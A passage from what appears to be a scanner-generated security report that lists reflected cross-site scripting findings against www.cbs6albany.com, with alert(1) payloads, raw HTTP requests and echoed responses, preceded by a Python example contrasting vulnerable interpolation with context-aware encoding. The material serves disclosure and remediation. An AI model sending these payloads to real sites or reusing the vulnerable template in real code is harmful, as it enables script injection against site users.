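Both findings on this host come down to output encoding that is missing for the context: a double-quoted attribute in 4.813 and a single-quoted JavaScript string in 4.814. The site runs PHP (X-Powered-By: PHP/5.2.0), where the matching encoders are htmlspecialchars($v, ENT_QUOTES, 'UTF-8') for the attribute and json_encode($v) for the script literal (json_encode escapes / by default, so a </script> inside the value becomes <\/script>; the JSON_HEX_TAG flag that also encodes < and > arrived in PHP 5.3). The following is an added example in Python, not code from www.bostonherald.com: it shows the raw interpolation the responses imply beside the encoded form, using the report's own payloads; the render_* templates are constructed to mirror the snippets above.

```python
"""Context-aware output encoding for the two reflection contexts in 4.813 and 4.814.

Added example: this is not code from www.bostonherald.com. The two render_*
functions are constructed to mirror the response snippets in the report; the
input values are the report's own payloads.
"""
import json

# Payloads as submitted in 4.813 (attribute context) and 4.814 (JS string context).
ATTR_PAYLOAD = 'Rep. James Valleec2820"><script>alert(1)</script>647d2a3054'
JS_PAYLOAD = "Rep. James Vallee60651</script><script>alert(1)</script>03fb46f749a"


def encode_for_html_attr(value: str) -> str:
    """Encode for a quoted HTML attribute value (what PHP's
    htmlspecialchars($v, ENT_QUOTES) does). '&' goes first so the entities
    produced by the later replacements are not encoded a second time."""
    return (value.replace("&", "&amp;")
                 .replace('"', "&quot;")
                 .replace("'", "&#x27;")
                 .replace("<", "&lt;")
                 .replace(">", "&gt;"))


def encode_for_js_string(value: str) -> str:
    """Return a double-quoted JavaScript string literal that is safe inside an
    inline <script> block.

    json.dumps escapes quotes, backslashes and control characters, but the HTML
    parser still ends the script element at a literal </script> and treats
    <!-- specially, regardless of JavaScript quoting. Escaping every '<' and
    '>' as the JavaScript escapes \\u003c and \\u003e closes both holes.
    U+2028 and U+2029 are line terminators in JavaScript source, so they are
    escaped as well.
    """
    literal = json.dumps(value, ensure_ascii=False)
    return (literal.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("\u2028", "\\u2028")
                   .replace("\u2029", "\\u2029"))


def render_vulnerable(topic: str) -> str:
    """Shape of the vulnerable output in the report: raw interpolation into a
    double-quoted attribute and into a single-quoted JS string."""
    return ('<input id="searchInput" type="text" value="%s" name="topic" />\n'
            "<script>page('search', '%s');</script>") % (topic, topic)


def render_hardened(topic: str) -> str:
    """Same markup, each interpolation run through the encoder for its context.
    The JS encoder supplies its own quotes, so the template has none there."""
    return ('<input id="searchInput" type="text" value="%s" name="topic" />\n'
            "<script>page('search', %s);</script>") % (
                encode_for_html_attr(topic), encode_for_js_string(topic))


def breaks_out(html: str) -> bool:
    """Cheap detector for the two breakouts the report demonstrates: a closed
    attribute followed by a new tag, or more than one script element."""
    return '"><script' in html or html.lower().count("<script") > 1


def js_roundtrips(value: str) -> bool:
    """The encoded literal must still decode to the original value."""
    return json.loads(encode_for_js_string(value)) == value
```

Escaping every < and > rather than just the </script> sequence is deliberate: it also neutralises <!--, which the HTML tokenizer treats specially inside script data, and it leaves nothing for a later HTML-decoding step to turn back into markup.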

4.815. http://www.cbs6albany.com/albany-community/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /albany-community/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a4e73'><script>alert(1)</script>3aa125e23eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /albany-communitya4e73'><script>alert(1)</script>3aa125e23eb/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:35:03 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:45:03 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 43346


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href='/albany-communitya4e73'><script>alert(1)</script>3aa125e23eb/'>
...[SNIP]...

4.816. http://www.cbs6albany.com/albany-community/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /albany-community/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d2433'><script>alert(1)</script>1aa9284fca0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /albany-community/?d2433'><script>alert(1)</script>1aa9284fca0=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:34:10 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:44:10 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 43349


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href='/albany-community/?d2433'><script>alert(1)</script>1aa9284fca0=1'>
...[SNIP]...

4.817. http://www.cbs6albany.com/albany-tv-programming/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /albany-tv-programming/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 75854'><script>alert(1)</script>1f82ca7f1ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /albany-tv-programming75854'><script>alert(1)</script>1f82ca7f1ce/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:34:54 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:44:54 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 42842


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href='/albany-tv-programming75854'><script>alert(1)</script>1f82ca7f1ce/'>
...[SNIP]...

4.818. http://www.cbs6albany.com/albany-tv-programming/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /albany-tv-programming/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 57577'><script>alert(1)</script>892855b7f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /albany-tv-programming/?57577'><script>alert(1)</script>892855b7f8=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:34:05 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:44:05 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 42844


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href='/albany-tv-programming/?57577'><script>alert(1)</script>892855b7f8=1'>
...[SNIP]...

4.819. http://www.cbs6albany.com/albany-weather-forecast [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /albany-weather-forecast

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8cdf9'><script>alert(1)</script>9e8a6ed6891 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /albany-weather-forecast8cdf9'><script>alert(1)</script>9e8a6ed6891 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:35:48 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:45:48 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 55398


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href='/albany-weather-forecast8cdf9'><script>alert(1)</script>9e8a6ed6891'>
...[SNIP]...

4.820. http://www.cbs6albany.com/albany-weather-forecast [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /albany-weather-forecast

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dec0c'><script>alert(1)</script>262a2c2a00e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /albany-weather-forecast?dec0c'><script>alert(1)</script>262a2c2a00e=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:34:54 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:44:54 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 55413


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href='/albany-weather-forecast?dec0c'><script>alert(1)</script>262a2c2a00e=1'>
...[SNIP]...

4.821. http://www.cbs6albany.com/common/archives/ [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /common/archives/

Issue detail

The value of the cat request parameter is copied into the HTML document as plain text between tags. The payload abbec<script>alert(1)</script>e73f5d44298 was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/archives/?cat=Movie+Reviewsabbec<script>alert(1)</script>e73f5d44298&db=fbi&template=movie.html HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:31:25 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:41:25 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 24964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
</script>e73f5d44298/?fabc=1&catID=0">Movie Reviewsabbec<script>alert(1)</script>e73f5d44298</a>
...[SNIP]...

4.822. http://www.cbs6albany.com/common/archives/ [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /common/archives/

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a1e6"><script>alert(1)</script>604e981a33a was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/archives/?cat=Movie+Reviews8a1e6"><script>alert(1)</script>604e981a33a&db=fbi&template=movie.html HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:31:14 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:41:14 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 24974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href="/sections/movie-reviews8a1e6"><script>alert(1)</script>604e981a33a/?fabc=1&catID=0">
...[SNIP]...

4.823. http://www.cbs6albany.com/common/archives/ [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /common/archives/

Issue detail

The value of the cat request parameter is copied into the HTML document as text between TITLE tags. The payload a03b2</title><script>alert(1)</script>e15addb93fd was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/archives/?cat=Movie+Reviewsa03b2</title><script>alert(1)</script>e15addb93fd&db=fbi&template=movie.html HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:31:36 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:41:36 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 25004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<title>Movie Reviewsa03b2</title><script>alert(1)</script>e15addb93fd Archive Stories - WRGB CBS 6 Albany</title>
...[SNIP]...

4.824. http://www.cbs6albany.com/common/archives/ [db parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /common/archives/

Issue detail

The value of the db request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc8ee"><script>alert(1)</script>d814807c00f was submitted in the db parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/archives/?cat=Movie+Reviews&db=fbifc8ee"><script>alert(1)</script>d814807c00f&template=movie.html HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:31:57 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:41:57 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 24802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href="/common/archives/?db=fbifc8ee"><script>alert(1)</script>d814807c00f">
...[SNIP]...

4.825. http://www.cbs6albany.com/common/tools/load.php [css parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /common/tools/load.php

Issue detail

The value of the css request parameter is copied into the response body, which is served as text/css, inside the leading /* ... */ comment that echoes the request URL. The payload 923ab<script>alert(1)</script>1fc4a4d87cc was submitted in the css parameter. This input was echoed unmodified in the application's response. Because the payload does not terminate the CSS comment and the response is not an HTML document, the script would run only in a browser that renders this response as HTML (for instance by content-sniffing it on direct navigation; the response carries no X-Content-Type-Options header). Confirm this in the target browsers before treating the finding as exploitable.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/tools/load.php?css=common_poll,common_layout_newspaper_nonav,common_nav,common_bcstyle,common_search,common_election,common_zvents,common_broadcast,site923ab<script>alert(1)</script>1fc4a4d87cc HTTP/1.1
Host: www.cbs6albany.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SC_LINKS=%5B%5BB%5D%5D; s_vnum=1298828234584%26vn%3D1; s_invisit=true; c_m=NoneDirect%20LoadDirect%20Load; cf=1; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296367200803%26vn%3D1; sinvisit_w=true; s_vnum_m=1296540000804%26vn%3D1; sinvisit_m=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:41:50 GMT
Server: Apache
Last-Modified: Sat, 29 Jan 2011 01:41:53 GMT
ETag: "d09207c4f3a16792c6068f097542a7c7-69981"
Cache-Control: max-age=86400
Expires: Sun, 30 Jan 2011 01:41:50 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/css
Content-Length: 69981

/* http://www.cbs6albany.com/common/tools/load.php?css=common_poll,common_layout_newspaper_nonav,common_nav,common_bcstyle,common_search,common_election,common_zvents,common_broadcast,site923ab<script>alert(1)</script>1fc4a4d87cc */
.articlepoll #pollwrapper {
width:249px;
}

.pollbars {
   font-family: Arial, Helvetica;
   font-size: 10px;
   font-style: normal;
   color: #ffffff;
   background-color: #000066;
   line-height: 1
...[SNIP]...

4.826. http://www.cbs6albany.com/common/tools/load.php [js parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /common/tools/load.php

Issue detail

The value of the js request parameter is copied into a JavaScript inline comment. The payload 24549*/alert(1)//d473b38e549 was submitted in the js parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Note that this response is a standalone script (text/javascript) rather than an HTML page: the injected code runs in the origin of whichever document includes this URL with a script tag, so impact against www.cbs6albany.com depends on a same-origin page sourcing load.php with an attacker-influenced js value. A third-party page that includes the URL itself only runs the code in its own origin.

Request

GET /common/tools/load.php?js=common_poll,common_nav,common_tabBox,common_contentslider,common_freedom,common_ads,common_page24549*/alert(1)//d473b38e549 HTTP/1.1
Host: www.cbs6albany.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SC_LINKS=%5B%5BB%5D%5D; s_vnum=1298828234584%26vn%3D1; s_invisit=true; c_m=NoneDirect%20LoadDirect%20Load; cf=1; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296367200803%26vn%3D1; sinvisit_w=true; s_vnum_m=1296540000804%26vn%3D1; sinvisit_m=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:41:47 GMT
Server: Apache
Last-Modified: Sat, 29 Jan 2011 01:41:47 GMT
ETag: "4e87463754d1a8a716b7c9d3be1c9068-25715"
Cache-Control: max-age=86400
Expires: Sun, 30 Jan 2011 01:41:47 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/javascript
Content-Length: 25715

/* http://www.cbs6albany.com/common/tools/load.php?js=common_poll,common_nav,common_tabBox,common_contentslider,common_freedom,common_ads,common_page24549*/alert(1)//d473b38e549 */
   function loadPoll(pollid,sitecode)
   {
           var pollwrapper = document.getElementById('pollwrapper');
           var scriptname = "/onsetfeature/pollcap.php?station=" + sitecode;
           getPollResult(pollid,
...[SNIP]...

4.827. http://www.cbs6albany.com/common/tools/load.php [js parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /common/tools/load.php

Issue detail

The value of the js request parameter is copied into the response body, which is served as text/javascript, inside the leading /* ... */ comment that echoes the request URL. The payload a475f<script>alert(1)</script>3024595e285 was submitted in the js parameter. This input was echoed unmodified in the application's response. Unlike 4.826, this payload does not close the comment, and the response is not an HTML document, so the script would run only in a browser that renders this response as HTML (for instance by content-sniffing it on direct navigation; the response carries no X-Content-Type-Options header). Confirm this in the target browsers before treating the finding as exploitable.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/tools/load.php?js=a475f<script>alert(1)</script>3024595e285 HTTP/1.1
Host: www.cbs6albany.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SC_LINKS=%5B%5BB%5D%5D; s_vnum=1298828234584%26vn%3D1; s_invisit=true; c_m=NoneDirect%20LoadDirect%20Load; cf=1; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296367200803%26vn%3D1; sinvisit_w=true; s_vnum_m=1296540000804%26vn%3D1; sinvisit_m=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:41:45 GMT
Server: Apache
Last-Modified: Sat, 29 Jan 2011 01:41:45 GMT
ETag: "7a19d1a13c57029e810a15327fa0ee7d-99"
Cache-Control: max-age=86400
Expires: Sun, 30 Jan 2011 01:41:45 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/javascript
Content-Length: 99

/* http://www.cbs6albany.com/common/tools/load.php?js=a475f<script>alert(1)</script>3024595e285 */

4.828. http://www.cbs6albany.com/common/tools/load.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /common/tools/load.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript inline comment. The payload 67037*/alert(1)//a0d841c9b61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

